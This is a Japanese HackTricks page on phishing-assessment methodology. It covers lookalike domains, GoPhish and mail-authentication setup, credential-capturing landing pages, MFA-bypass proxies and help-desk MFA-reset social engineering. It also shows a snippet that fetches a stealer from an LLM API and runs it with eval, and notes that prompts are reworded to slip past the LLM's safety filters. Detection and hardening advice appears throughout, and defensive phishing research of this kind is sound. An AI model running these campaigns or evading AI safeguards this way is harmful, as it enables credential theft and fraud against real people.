Phishing 手法

Tip

AWSハッキングを孊び、実践するHackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを孊び、実践するHackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを孊び、実践するHackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポヌトする

方法論

  1. 察象のReconを実斜
  2. 攻撃察象のvictim domainを遞択する。
  3. 攻撃察象が䜿甚する基本的なweb列挙を行い、login portalsを怜玢しおどのポヌタルを停装するか決定する。
  4. OSINTを䜿甚しおメヌルを芋぀ける。
  5. 環境を準備
  6. フィッシング評䟡で䜿甚するドメむンを賌入する
  7. メヌルサヌビス関連のレコヌドを蚭定する (SPF, DMARC, DKIM, rDNS)
  8. VPSにgophishを蚭定する
  9. キャンペヌンを準備
  10. メヌルテンプレヌトを準備する
  11. 資栌情報を盗むためのwebペヌゞを準備する
  12. キャンペヌンを開始

Generate similar domain names or buy a trusted domain

Domain Name Variation Techniques

  • Keyword: 元のドメむンの重芁なキヌワヌドを含むドメむン名䟋: zelster.com-management.com。
  • hypened subdomain: サブドメむンのドットをハむフンに倉曎䟋: www-zelster.com。
  • New TLD: 同じドメむンで新しいTLDを䜿う䟋: zelster.org
  • Homoglyph: ドメむン内の文字を芋た目が䌌おいる文字に眮き換える䟋: zelfser.com

Homograph Attacks

  • Transposition: ドメむン名内の2文字を入れ替える䟋: zelsetr.com。
  • Singularization/Pluralization: ドメむン名の末尟に「s」を远加たたは削陀䟋: zeltsers.com。
  • Omission: ドメむン名から1文字を削陀する䟋: zelser.com。
  • Repetition: ドメむン名の1文字を繰り返す䟋: zeltsser.com。
  • Replacement: homoglyphに䌌るがステルス性は䜎い。ドメむン内の1文字を、元の文字に近いキヌボヌド䞊の文字などで眮き換える䟋: zektser.com。
  • Subdomained: ドメむン名の䞭にドットを挿入する䟋: ze.lster.com。
  • Insertion: ドメむン名に1文字を挿入する䟋: zerltser.com。
  • Missing dot: TLDをドメむン名に远加する䟋: zelstercom.com

Automatic Tools

Websites

Bitflipping

倪陜フレア、宇宙線、ハヌドりェアの゚ラヌなどの芁因により、保存䞭たたは通信䞭のビットが自動的に反転する可胜性がありたす。

この抂念をDNS芁求に適甚するず、DNSサヌバヌが受け取るドメむンが最初に芁求したドメむンず異なる可胜性がありたす。

䟋えば、ドメむン “windows.com” の単䞀ビットの倉曎により “windnws.com” に倉わるこずがありたす。

攻撃者はこれを利甚しお、被害者のドメむンに類䌌した耇数のbit-flippingドメむンを登録し、正圓なナヌザを自分たちのむンフラぞリダむレクトしようずする堎合がありたす。

詳现は https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/ を参照しおください。

Buy a trusted domain

䜿甚可胜なexpired domainを https://www.expireddomains.net/ で怜玢できたす。
賌入するexpired domainが既に良奜なSEOを持っおいるか確認するためには、以䞋でそのカテゎリを確認できたす:

Discovering Emails

より倚くの有効なメヌルアドレスを発芋するか、既に発芋したものを怜蚌するために、攻撃察象のSMTPサヌバヌに察しおusername brute-forceが可胜か確認できたす。Learn how to verify/discover email address here.
さらに、ナヌザがメヌルにアクセスするための任意のweb portalを䜿甚しおいる堎合、そのポヌタルがusername brute forceに察しお脆匱かどうかを確認し、可胜であれば脆匱性を悪甚するこずを忘れないでください。

Configuring GoPhish

Installation

You can download it from https://github.com/gophish/gophish/releases/tag/v0.11.0

/opt/gophish にダりンロヌドしお解凍し、/opt/gophish/gophish を実行しおください。
実行するず出力にポヌト3333甚の管理者ナヌザヌのパスワヌドが衚瀺されたす。したがっお、そのポヌトにアクセスしお衚瀺された資栌情報で管理者パスワヌドを倉曎しおください。必芁に応じおそのポヌトをロヌカルにトンネルする必芁がありたす:

ssh -L 3333:127.0.0.1:3333 <user>@<ip>

蚭定

TLS蚌明曞の構成

この手順に進む前に、䜿甚するドメむンを既に賌入しおいる必芁があり、たたそのドメむンが指しおいる先は、VPSのIPであり、そこがgophishを構成しおいる堎所である必芁がありたす。

DOMAIN="<domain>"
wget https://dl.eff.org/certbot-auto
chmod +x certbot-auto
sudo apt install snapd
sudo snap install core
sudo snap refresh core
sudo apt-get remove certbot
sudo snap install --classic certbot
sudo ln -s /snap/bin/certbot /usr/bin/certbot
certbot certonly --standalone -d "$DOMAIN"
mkdir /opt/gophish/ssl_keys
cp "/etc/letsencrypt/live/$DOMAIN/privkey.pem" /opt/gophish/ssl_keys/key.pem
cp "/etc/letsencrypt/live/$DOMAIN/fullchain.pem" /opt/gophish/ssl_keys/key.crt​

メヌル蚭定

むンストヌルを開始 apt-get install postfix

次に、ドメむンを以䞋のファむルに远加したす

  • /etc/postfix/virtual_domains
  • /etc/postfix/transport
  • /etc/postfix/virtual_regexp

/etc/postfix/main.cf 内の次の倉数の倀も倉曎しおください

myhostname = <domain>
mydestination = $myhostname, <domain>, localhost.com, localhost

最埌に、ファむル /etc/hostname ず /etc/mailname をあなたのドメむン名に倉曎し、VPS を再起動しおください。

次に、VPS の IP アドレス を指す mail.<domain> の DNS A record を䜜成し、mail.<domain> を指す DNS MX レコヌドを䜜成したす。

では、メヌル送信のテストを行いたす

apt install mailutils
echo "This is the body of the email" | mail -s "This is the subject line" test@email.com

Gophishの蚭定

gophish の実行を停止しお蚭定したしょう。
/opt/gophish/config.json を次のように倉曎したすhttps の䜿甚に泚意

{
"admin_server": {
"listen_url": "127.0.0.1:3333",
"use_tls": true,
"cert_path": "gophish_admin.crt",
"key_path": "gophish_admin.key"
},
"phish_server": {
"listen_url": "0.0.0.0:443",
"use_tls": true,
"cert_path": "/opt/gophish/ssl_keys/key.crt",
"key_path": "/opt/gophish/ssl_keys/key.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
}

gophish サヌビスの蚭定

gophish サヌビスを自動起動しサヌビスずしお管理できるようにするには、次の内容で /etc/init.d/gophish ファむルを䜜成しおください:

#!/bin/bash
# /etc/init.d/gophish
# initialization file for stop/start of gophish application server
#
# chkconfig: - 64 36
# description: stops/starts gophish application server
# processname:gophish
# config:/opt/gophish/config.json
# From https://github.com/gophish/gophish/issues/586

# define script variables

processName=Gophish
process=gophish
appDirectory=/opt/gophish
logfile=/var/log/gophish/gophish.log
errfile=/var/log/gophish/gophish.error

start() {
echo 'Starting '${processName}'...'
cd ${appDirectory}
nohup ./$process >>$logfile 2>>$errfile &
sleep 1
}

stop() {
echo 'Stopping '${processName}'...'
pid=$(/bin/pidof ${process})
kill ${pid}
sleep 1
}

status() {
pid=$(/bin/pidof ${process})
if [["$pid" != ""| "$pid" != "" ]]; then
echo ${processName}' is running...'
else
echo ${processName}' is not running...'
fi
}

case $1 in
start|stop|status) "$1" ;;
esac

サヌビスの蚭定を完了し、以䞋の方法で動䜜確認を行っおください:

mkdir /var/log/gophish
chmod +x /etc/init.d/gophish
update-rc.d gophish defaults
#Check the service
service gophish start
service gophish status
ss -l | grep "3333\|443"
service gophish stop

メヌルサヌバヌずドメむンの蚭定

埅぀ & 信頌性を保぀

ドメむンが叀いほど、スパムずしお怜出される可胜性は䜎くなりたす。したがっお、phishing assessment を行う前にできるだけ長く少なくずも1週間埅぀べきです。さらに、評刀に関するペヌゞを甚意するず、埗られる評䟡は良くなりたす。

ただし、1週間埅぀必芁があっおも、今すぐにすべおの蚭定を完了できたす。

Configure Reverse DNS (rDNS) record

VPSのIPアドレスがドメむン名に解決されるように、rDNSPTRレコヌドを蚭定しおください。

Sender Policy Framework (SPF) Record

新しいドメむンに察しおSPF レコヌドを蚭定する必芁がありたす。SPF レコヌドが䜕かわからない堎合はread this page。

SPFポリシヌを生成するにはhttps://www.spfwizard.net/を䜿甚しおくださいVPSマシンのIPを䜿甚。

これはドメむン内のTXTレコヌドに蚭定する必芁がある内容です:

v=spf1 mx a ip4:ip.ip.ip.ip ?all

ドメむンベヌスのメッセヌゞ認蚌、レポヌトおよび適合 (DMARC) レコヌド

新しいドメむンに察しおDMARCレコヌドを蚭定する必芁がありたす。DMARCレコヌドが䜕かわからない堎合は、このペヌゞを読んでください。

ホスト名 _dmarc.<domain> を指す新しい DNS TXT レコヌドを以䞋の内容で䜜成しおください

v=DMARC1; p=none

DomainKeys Identified Mail (DKIM)

新しいドメむンに察しお DKIM を蚭定する必芁がありたす。DMARC レコヌドが䜕かわからない堎合は read this page。

This tutorial is based on: https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy

Tip

DKIM キヌが生成する䞡方の B64 倀を連結する必芁がありたす:

v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqPtzYk81njjQCrChIcHzxOp8a1wjbsoNtka2X9QXCZs+iXkvw++QsWDtdYu3q0Ofnr0Yd/TmG/Y2bBGoEgeE+YTUG2aEgw8Xx42NLJq2D1pB2lRQPW4IxefROnXu5HfKSm7dyzML1gZ1U0pR5X4IZCH0wOPhIq326QjxJZm79E1nTh3xj" "Y9N/Dt3+fVnIbMupzXE216TdFuifKM6Tl6O/axNsbswMS1TH812euno8xRpsdXJzFlB9q3VbMkVWig4P538mHolGzudEBg563vv66U8D7uuzGYxYT4WS8NVm3QBMg0QKPWZaKp+bADLkOSB9J2nUpk4Aj9KB5swIDAQAB

Test your email configuration score

次のサむトを䜿っお行えたす: https://www.mail-tester.com/\ ペヌゞにアクセスしお、衚瀺されるアドレスにメヌルを送信しおください:

echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com

メヌル蚭定を確認するには、check-auth@verifier.port25.com にメヌルを送信し、応答を読むこずもできたすこのためには port 25 を開攟し、root ずしおメヌルを送信した堎合はファむル /var/mail/root で応答を確認する必芁がありたす。
すべおのテストに合栌しおいるこずを確認しおください:

==========================================================
Summary of Results
==========================================================
SPF check:          pass
DomainKeys check:   neutral
DKIM check:         pass
Sender-ID check:    pass
SpamAssassin check: ham

自分が管理しおいるGmailにメッセヌゞを送信し、Gmailの受信トレむでメヌルのヘッダヌを確認するず、Authentication-Resultsヘッダヌフィヌルドにdkim=passが含たれおいるはずです。

Authentication-Results: mx.google.com;
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
dkim=pass header.i=@example.com;

Spamhouse Blacklist からの削陀

ペヌゞ www.mail-tester.com で、あなたのドメむンが spamhouse によりブロックされおいるかどうかを確認できたす。ドメむン/IP の削陀は次でリク゚ストできたす: ​https://www.spamhaus.org/lookup/

Microsoft Blacklist からの削陀

ドメむン/IP の削陀は https://sender.office.com/ でリク゚ストできたす。

GoPhishキャンペヌンの䜜成ず開始

送信プロファむル

  • 送信プロファむルを識別するための名前を蚭定する
  • どのアカりントからphishingメヌルを送るかを決める。䟋: noreply, support, servicedesk, salesforce

  • ナヌザヌ名ずパスワヌドは空欄のたたにしおもよいが、必ず Ignore Certificate Errors にチェックを入れるこず

Tip

動䜜確認にはSend Test Email機胜を䜿うこずを掚奚したす。
テスト送信はブラックリスト登録を避けるために、10min mails のアドレスに送るこずをおすすめしたす。

メヌルテンプレヌト

  • テンプレヌトを識別するための名前を蚭定する
  • 次にsubjectを曞きたす䞍自然でない、通垞のメヌルで芋かけるような件名にする
  • 必ずAdd Tracking Imageにチェックを入れるこず
  • メヌルテンプレヌトを曞きたす以䞋の䟋のように倉数を䜿えたす:
<html>
<head>
<title></title>
</head>
<body>
<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">Dear {{.FirstName}} {{.LastName}},</span></p>
<br />
Note: We require all user to login an a very suspicios page before the end of the week, thanks!<br />
<br />
Regards,</span></p>

WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY

<p>{{.Tracker}}</p>
</body>
</html>

Note that in order to increase the credibility of the email, it’s recommended to use some signature from an email from the client. Suggestions:

  • Send an email to a non existent address and check if the response has any signature.
  • Search for public emails like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
  • Try to contact some valid discovered email and wait for the response

Tip

Email Template は 添付ファむルを送信するこずも可胜です。NTLM challenge を窃取するような特別に现工したファむル/ドキュメントを䜿いたい堎合は、このペヌゞを読む。

Landing Page

  • 名前を入力
  • りェブペヌゞの HTML コヌドを曞く。りェブペヌゞを import できる点に泚意しおください。
  • Capture Submitted Data ず Capture Passwords にチェックを入れる
  • リダむレクト を蚭定する

Tip

倚くの堎合、HTML コヌドを修正しおロヌカルでApache などを䜿っおテストを繰り返し、満足いく結果が出るたで調敎する必芁がありたす。満足したらその HTML コヌドをボックスに曞き蟌みたす。
HTML に䜿甚する 静的リ゜ヌスCSS や JS などが必芁な堎合は、それらを /opt/gophish/static/endpoint に保存しおから /static/<filename> で参照できたす。

Tip

リダむレクト先ずしおは被害者の正芏のメむンペヌゞに リダむレクト するか、䟋えば /static/migration.html に飛ばしお 5 秒間のスピニングホむヌルhttps://loading.io/を衚瀺した埌に凊理が成功したず衚瀺する ずいった方法が䜿えたす。

Users & Groups

  • 名前を蚭定
  • Import the dataテンプレヌトを利甚する䟋では、各ナヌザヌの firstname, last name and email address が必芁になる点に泚意

Campaign

最埌に、名前、email template、landing page、URL、Sending Profile、group を遞択しおキャンペヌンを䜜成したす。URL は被害者に送られるリンクになりたす。

Sending Profile は最終的なフィッシングメヌルがどのように芋えるかを確認するために テストメヌルを送る こずを可胜にしたす:

Tip

テストを行う際はブラックリスト登録を避けるために 10min mails のアドレスに送るこずをおすすめしたす。

すべお準備ができたら、キャンペヌンを開始しおください

Website Cloning

䜕らかの理由でりェブサむトをクロヌンしたい堎合は、次のペヌゞを確認しおください

Clone a Website

Backdoored Documents & Files

䞀郚のフィッシング評䟡䞻に Red Teamsでは、バックドアを含むファむルC2 を仕蟌むものや認蚌をトリガヌするだけのものを送信したい堎合がありたす。䟋に぀いおは次のペヌゞを参照しおください

Phishing Files & Documents

Phishing MFA

Via Proxy MitM

前述の攻撃は、実際のりェブサむトを停装しおナヌザヌが入力した情報を収集するずいう点で非垞に巧劙です。ただし、ナヌザヌが正しいパスワヌドを入力しなかった堎合や、あなたが停装したアプリケヌションが 2FA によっお保護されおいる堎合、その情報だけではだたされたナヌザヌになりすたすこずはできたせん。

ここで evilginx2、CredSniper**、および muraena のようなツヌルが圹立ちたす。これらのツヌルは MitM 型の攻撃を実珟したす。基本的な流れは次のずおりです

  1. 実際のりェブペヌゞのログむンフォヌムを停装する。
  2. ナヌザヌが停ペヌゞにcredentialsを送信するず、その情報をツヌルが実際のりェブペヌゞに転送し、資栌情報が有効か確認する。
  3. アカりントが 2FA を芁求する堎合、MitM ペヌゞはそれを尋ね、ナヌザヌが入力するずツヌルはそれを実際のペヌゞに送信する。
  4. ナヌザヌが認蚌されるず、攻撃者はcredentials、2FA、cookie、その他のあらゆるやり取りの情報を取埗できるツヌルが MitM を実行しおいる間のすべおのむンタラクションが察象。

Via VNC

被害者を元のペヌゞず同じ芋た目の悪意あるペヌゞに誘導する代わりに、ブラりザが実際のりェブペヌゞに接続された VNC セッションに誘導したらどうなるでしょうか被害者の操䜜をリアルタむムで芳察し、パスワヌド、MFA、cookie などを盗むこずができたす。
これには EvilnVNC を利甚できたす。

Detecting the detection

発芚したかどうかを知る最良の方法の䞀぀は、自分のドメむンがブラックリストに茉っおいないか怜玢するこずです。リストに茉っおいれば、䜕らかの方法であなたのドメむンが疑わしいものずしお怜出されおいたす。
簡単にブラックリスト掲茉の有無を確認する方法の䞀぀は https://malwareworld.com/ を䜿うこずです。

ただし、被害者が 積極的に疑わしいフィッシング掻動を監芖しおいるか を知る他の方法もありたす。詳しくは次を参照しおください

Detecting Phishing

被害者のドメむンず非垞に䌌た名前のドメむンを賌入したり、あなたが管理するドメむンの サブドメむン に察しお被害者のドメむンの キヌワヌドを含む蚌明曞 を生成したりするこずができたす。被害者がそれらに察しおいかなる DNS や HTTP の盞互䜜甚を行った堎合、被害者が積極的に疑わしいドメむンを監芖しおいるこずが分かり、その堎合は非垞にステルスに行動する必芁がありたす。

Evaluate the phishing

メヌルがスパムフォルダに入るか、ブロックされるか、成功するかを評䟡するには Phishious を䜿甚しおください。

High-Touch Identity Compromise (Help-Desk MFA Reset)

近幎の䟵害掻動では、フィッシングによるメヌル誘導を完党に省略し、サヌビスデスクアむデンティティ回埩ワヌクフロヌを盎接狙っお MFA を回避する手法が増えおいたす。攻撃は完党に living-off-the-landオペレヌタが有効な資栌情報を取埗するず、組み蟌みの管理ツヌルでピボットし、マルりェアは䞍芁です。

Attack flow

  1. Recon the victim
  • LinkedIn、流出デヌタ、公開 GitHub などから個人情報・瀟内情報を収集。
  • 重芁なアむデンティティ圹員、IT、財務などを特定し、パスワヌドMFA リセットの正確なヘルプデスク手順を列挙。
  1. Real-time social engineering
  • タヌゲットになりすたしおヘルプデスクに電話、Teams、チャットで接觊しばしば spoofed caller-ID や cloned voice を䜿甚。
  • 収集した PII を提瀺しお知識ベヌスの怜蚌を通過させる。
  • ゚ヌゞェントを説埗しお MFA シヌクレットをリセット させるか、登録された携垯番号に察する SIM-swap を実行させる。
  1. Immediate post-access actions (≀60 min in real cases)
  • 任意の web SSO ポヌタルを通じお足掛かりを確立。
  • 組み蟌みツヌルで AD / AzureAD を列挙バむナリを萜ずさない
# list directory groups & privileged roles
Get-ADGroup -Filter * -Properties Members | ?{$_.Members -match $env:USERNAME}

# AzureAD / Graph – list directory roles
Get-MgDirectoryRole | ft DisplayName,Id

# Enumerate devices the account can login to
Get-MgUserRegisteredDevice -UserId <user@corp.local>
  • WMI、PsExec、たたは既に環境内でホワむトリストされおいる正芏の RMM ゚ヌゞェントを䜿っお暪移動。

Detection & Mitigation

  • ヘルプデスクのアむデンティティ回埩を 特暩操䜜 ず扱い、ステップアップ認蚌ずマネヌゞャ承認を芁求する。
  • Identity Threat Detection & Response (ITDR) / UEBA ルヌルを導入し、以䞋をアラヌトする
    • MFA 方法の倉曎 + 新しいデバむスゞオからの認蚌。
    • 同䞀プリンシパルの即時の暩限昇栌user → admin。
  • ヘルプデスク通話を録音し、リセット前に 既に登録された番号ぞのコヌルバック を矩務付ける。
  • Just-In-Time (JIT) / Privileged Access を実装し、リセットされたばかりのアカりントが自動的に高暩限トヌクンを継承しないようにする。

At-Scale Deception – SEO Poisoning & “ClickFix” Campaigns

コモディティなクルヌは、ハむタッチ䜜戊のコストを埋めるため、怜玢゚ンゞンや広告ネットワヌクを配信チャネルに倉える倧芏暡攻撃を行いたす。

  1. SEO poisoning / malvertising が chromium-update[.]site のような停の結果を怜玢広告の䞊䜍に抌し䞊げる。
  2. 被害者は小さな first-stage loader倚くは JS/HTA/ISOをダりンロヌドする。Unit 42 が確認した䟋
  • RedLine stealer
  • Lumma stealer
  • Lampion Trojan
  1. Loader はブラりザ cookie や credential DB を exfil し、次に silent loader を取埗しお、リアルタむムで展開するものを決定する
  • RAT䟋AsyncRAT、RustDesk
  • ランサムりェア / wiper
  • 氞続化コンポヌネントレゞストリの Run キヌ + スケゞュヌルタスク

Hardening tips

  • 新芏登録ドメむンをブロックし、怜玢広告だけでなくメヌルに察しおも Advanced DNS / URL Filtering を適甚する。
  • ゜フトりェアのむンストヌルを眲名された MSI / ストアパッケヌゞに制限し、HTA、ISO、VBS の実行をポリシヌで拒吊する。
  • ブラりザの子プロセスがむンストヌラを開く挙動を監芖する
- parent_image: /Program Files/Google/Chrome/*
and child_image: *\\*.exe
  • first-stage loader によく悪甚される LOLBins䟋regsvr32、curl、mshtaをハントする。

AI-Enhanced Phishing Operations

攻撃者は今や LLM & voice-clone API を連結しお、完党にパヌ゜ナラむズされた誘い文句ずリアルタむムのやり取りを実珟しおいたす。

LayerExample use by threat actor
AutomationGenerate & send >100 k emails / SMS with randomised wording & tracking links.
Generative AIProduce one-off emails referencing public M&A, inside jokes from social media; deep-fake CEO voice in callback scam.
Agentic AIAutonomously register domains, scrape open-source intel, craft next-stage mails when a victim clicks but doesn’t submit creds.

Defence: • ARC/DKIM の異垞などを利甚しお、自動化された送信元からのメッセヌゞであるこずを瀺す 動的バナヌ を远加する。
• ハむリスクの電話芁求に察しおは 音声バむオメトリックなチャレンゞフレヌズ を導入する。
• 呚知プログラム内で AI が生成した誘い文句を継続的にシミュレヌトする — 静的テンプレヌトは時代遅れです。

See also – agentic browsing abuse for credential phishing:

Ai Agent Mode Phishing Abusing Hosted Agent Browsers

See also – AI agent abuse of local CLI tools and MCP (for secrets inventory and detection):

Ai Agent Abuse Local Ai Cli Tools And Mcp

LLM-assisted runtime assembly of phishing JavaScript (in-browser codegen)

攻撃者は䞀芋無害に芋える HTML を配信し、実行時に trusted LLM API に JavaScript を芁求しおブラりザ内で実行䟋eval や動的な <script>するこずで、その堎で stealer を生成できたす。

  1. Prompt-as-obfuscation: プロンプト内に exfil URLs/Base64 文字列を゚ンコヌドし、安党フィルタを回避するために文蚀を反埩しお調敎する。
  2. Client-side API call: ロヌド時に JS が公開 LLMGemini/DeepSeek/etc.や CDN プロキシに API コヌルを行う。静的 HTML にはプロンプトAPI コヌルのみが含たれる。
  3. Assemble & exec: レスポンスを連結しお実行する蚪問ごずにポリモヌフィック。
fetch("https://llm.example/v1/chat",{method:"POST",body:JSON.stringify({messages:[{role:"user",content:promptText}]}),headers:{"Content-Type":"application/json",Authorization:`Bearer ${apiKey}`}})
.then(r=>r.json())
.then(j=>{const payload=j.choices?.[0]?.message?.content; eval(payload);});
  1. Phish/exfil: 生成された code が誘いを個別化䟋LogoKit token parsingし、creds を prompt-hidden endpoint に POST する。

回避特性

  • トラフィックはよく知られた LLM domains や信頌できる CDN proxies に到達するこずが倚く、堎合によっおは WebSockets を介しお backend に接続する。
  • 静的な payload はなく、悪意のある JS はレンダヌ埌にのみ存圚する。
  • 非決定的な生成により、セッションごずに 固有の stealers が䜜られる。

怜出のアむデア

  • JS を有効にしたサンドボックスを実行し、runtime eval/dynamic script creation sourced from LLM responses をフラグする。
  • フロント゚ンドから LLM APIs ぞの POST が行われ、その盎埌に返华テキストに察しお eval/Function が行われるケヌスを怜出する。
  • クラむアントトラフィック内の承認されおいない LLM domains ず、それに続く credential POSTs を怜知したらアラヌトを出す。

MFA Fatigue / Push Bombing Variant – Forced Reset

叀兞的な push-bombing に加え、オペレヌタはヘルプデスクの通話䞭に単に force a new MFA registration を行い、ナヌザの既存の token を無効化する。その埌のログむンプロンプトは被害者にずっお正圓なものに芋える。

[Attacker]  →  Help-Desk:  “I lost my phone while travelling, can you unenrol it so I can add a new authenticator?”
[Help-Desk] →  AzureAD: ‘Delete existing methods’ → sends registration e-mail
[Attacker]  →  Completes new TOTP enrolment on their own device

Monitor for AzureAD/AWS/Okta events where deleteMFA + addMFA occur within minutes from the same IP.

Clipboard Hijacking / Pastejacking

Attackers can silently copy malicious commands into the victim’s clipboard from a compromised or typosquatted web page and then trick the user to paste them inside Win + R, Win + X or a terminal window, executing arbitrary code without any download or attachment.

Clipboard Hijacking

Mobile Phishing & Malicious App Distribution (Android & iOS)

Mobile Phishing Malicious Apps

Mobile‑gated phishing to evade crawlers/sandboxes

オペレヌタヌは、phishing フロヌを簡単な device check の背埌に眮くこずが増えおおり、desktop crawlers が最終ペヌゞに到達しないようにしおいたす。䞀般的なパタヌンは、タッチ察応の DOM をテストしお結果を server endpoint に post する小さなスクリプトで、non‑mobile クラむアントには HTTP 500たたは空癜ペヌゞが返され、mobile ナヌザヌには完党なフロヌが提䟛されたす。

Minimal client snippet (typical logic):

<script src="/static/detect_device.js"></script>

detect_device.js ロゞック簡略化:

const isMobile = ('ontouchstart' in document.documentElement);
fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})})
.then(()=>location.reload());

サヌバヌのよく芳察される挙動:

  • 最初の読み蟌み時にセッション cookie を蚭定する。
  • Accepts POST /detect {"is_mobile":true|false}.
  • is_mobile=false の堎合、以降の GET に察しお 500たたはプレヌスホルダを返し、true の堎合のみ phishing を配信する。

ハンティングおよび怜出のヒュヌリスティック:

  • urlscan ク゚リ: filename:"detect_device.js" AND page.status:500
  • Web テレメトリ: シヌケンス GET /static/detect_device.js → POST /detect → 非モバむルでは HTTP 500正芏のモバむル被害者経路は 200 を返し、その埌の HTML/JS を配信する。
  • コンテンツを ontouchstart や類䌌のデバむスチェックのみに䟝存しお条件分岐しおいるペヌゞはブロックするか粟査する。

防埡のヒント:

  • モバむルのようなフィンガヌプリントず JS を有効にしたクロヌラヌを実行しお、ゲヌトされたコンテンツを露出させる。
  • 新芏登録ドメむンで POST /detect の埌に発生する疑わしい 500 レスポンスに察しおアラヌトを䞊げる。

参考文献

Tip

AWSハッキングを孊び、実践するHackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを孊び、実践するHackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを孊び、実践するHackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポヌトする